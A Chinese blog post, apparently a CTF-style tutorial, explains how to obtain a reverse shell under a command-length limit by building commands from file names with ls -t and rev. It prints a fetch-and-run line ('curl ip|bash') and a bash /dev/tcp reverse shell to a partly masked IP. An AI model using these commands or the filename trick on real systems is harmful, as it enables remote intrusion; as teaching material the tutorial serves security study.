码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 限制命令长度如何反弹shell


    问题:限制命令在7句以内如何反弹shell

    先来看一个命令

    直接输入一个*,发现输出了hello_qf.来看一下如何实现

    在一个新的目录中,我们输入这样的命令就可以输出hello_qf了。因为输入*就是echo hello_qf

    于是输出了hello_qf.

    那我们再来看一下使用命令ls -l

    有两个方法:

    方法一:

    利用rev把字符串反过来。

    rev作用:把字符串头变成尾,尾变成头翻转

    test的内容

    this is test

    开始操作:

    >dir原因

    把 a 和 b 写到 c 里面

    dir a b>c

    执行了*>v,就是

    dir l- sl > v

    >v使用字母v的原因

    *v>x就是

    rev v

    方法二:

    待会使用反弹shell就是用这个方法,利用ls -t 的时间顺序来实现执行命令

    abde994abc1391e112c0a65c808d2eae.png

    反弹shell:

    首先要确立一个反弹shell的语句,因为我们要设置为这个文件名,所以要尽量简单,而且尽量少有那种奇怪的符号。于是确立这个语句:

    curl ip/shell.txt|bash

    shell.txt的内容就是反弹shell

    bash -i >& /dev/tcp/47.xxx.xxx.51/2333 0>&1

    但是这里面有一个'/'要避免,那我们就把这个shell.txt设置成默认页面,然后命令变成:

    curl ip|bash

     

    以上是命令

    到服务器看一眼:

    成功反弹shell

  • 相关阅读:
    Vue3封装axios
    Golang Web开发一键生成各层级模板代码
    Java_常用API
    【SLAM】Sophus库的超详细解析
    Android Aidl跨进程通讯(四)--接口回调,服务端向客户端发送数据
    一周侃 | 周末随笔
    23111707[含文档+PPT+源码等]计算机毕业设计基于javawebmysql的旅游网址前后台-全新项目
    谷歌开发者社区推荐:《Jetpack Compose 从入门到实战》新书上架,带你踏上 Compose 开发之旅~
    新生儿吐奶的原因以及处理方法,非常实用(建议收藏)
    简单理解旁路电容和去耦电容
  • 原文地址:https://blog.csdn.net/qq_64201116/article/details/126178905
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号